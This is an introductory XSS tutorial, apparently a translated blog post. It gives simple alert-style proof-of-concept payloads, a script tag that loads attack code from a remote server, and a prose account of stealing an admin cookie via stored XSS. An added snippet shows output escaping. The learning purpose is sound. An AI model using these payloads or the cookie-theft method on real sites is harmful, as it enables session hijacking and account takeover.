Attack it xss !!!

  Blog write more good looking uncomfortable ah trained, trained, trained,

XSS online test environment:

  http://xss-quiz.int21h.jp/

  https://brutelogic.com.br/xss.php

Both sites are helpful for understanding XSS!!!

https://www.anquanke.com/post/id/86585

https://www.jianshu.com/p/99cf89bb65c3 


Start learning ------> <-------

XSS Introduction:

  XSS stands for cross-site scripting (Cross-Site Scripting). Because the natural abbreviation would be the same as CSS (Cascading Style Sheets), it was renamed XSS. An XSS attack is carried out through malicious JavaScript statements. JS can manipulate HTML, CSS and the browser very flexibly, which also gives XSS a very wide attack range.

 

What XSS can be used for:

  1. Stealing user accounts
  2. Stealing cookie information
  3. Hijacking user sessions to perform arbitrary operations
  4. Inflating traffic and displaying pop-up ads
  5. Spreading worms

To be honest, I can only do a few of these and can only pop up a small box; after all, I have no need for criminal profit. Well, mainly because I am not skilled enough.

How XSS works:

  When JS statements in client-supplied input are not filtered and the browser is able to execute them as JS code, that is an XSS vulnerability.

XSS simple verification poc:

<script>alert(/xss/)</script> (commonly used)

<script>confirm('xss')</script>

<script>prompt('xss')</script>
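The principle above, shown with the first PoC as input. This is an added example, not part of the original post: a search page (the reflected case in the classification below) rendered once without filtering and once with HTML output encoding. The function names are hypothetical.

```javascript
// Added example (not from the original post). escapeHtml, renderSearchUnsafe
// and renderSearchSafe are hypothetical names chosen for illustration.

// Characters that are significant in HTML text and in quoted attribute values.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode a value for output into HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the query parameter is concatenated into the page as-is,
// so markup in the parameter becomes markup in the response.
function renderSearchUnsafe(query) {
  return `<p>Results for: ${query}</p>`;
}

// Hardened: the parameter is encoded for the HTML context before output,
// so the browser displays it as text instead of parsing it as a tag.
// The same encoding keeps it from breaking out of the quoted attribute.
function renderSearchSafe(query) {
  return `<p>Results for: ${escapeHtml(query)}</p>` +
    `<input name="q" value="${escapeHtml(query)}">`;
}

// Constructed input: the first verification PoC from the list above.
const poc = '<script>alert(/xss/)</script>';

console.log('unsafe:', renderSearchUnsafe(poc)); // script tag survives intact
console.log('safe:  ', renderSearchSafe(poc));   // only encoded text remains
```

Encoding must match the output context: this helper covers HTML text and quoted attributes only, not values written into inline scripts, URLs or CSS.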

 

XSS classification:

  1. Reflected XSS

   Reflected XSS is the non-persistent, parameter-based type of cross-site scripting: the JS code is carried in a parameter of the web application, for example in the search box, which is the most common case.

  2. Stored XSS

   Stored XSS is the persistent type of cross-site scripting. It also goes through a parameter, but the payload is written to a medium that keeps the data permanently, such as a database or a file. It is triggered only when a client browser later requests from the server the page that contains the malicious XSS code.

  3. DOM-based XSS

    In DOM-based XSS, the attack payload executes by modifying the DOM tree of the page in the victim's browser. Because the payload modifies the DOM tree locally in the browser and is not sent to the server, DOM-based XSS is harder to detect.

 

XSS construction: payloads can be constructed in many forms, including but not limited to

XSS variants: mutating a payload to bypass protections is a skill of its own and is not covered here.

Calling shellcode:

  In this context, shellcode is the code executed during exploitation to complete the XSS attack. The shellcode is stored on a server and is called when the XSS is triggered: <script src="http://localhost/XSS-TEST/normal/xss.js"></script>

 

Small experiment: cookie hijacking

  Plant a stored XSS. It is triggered when the administrator views the page, the cookie is sent to the hacker's server, and the cookie is then replayed to log in.


Origin www.cnblogs.com/foe0/p/11384650.html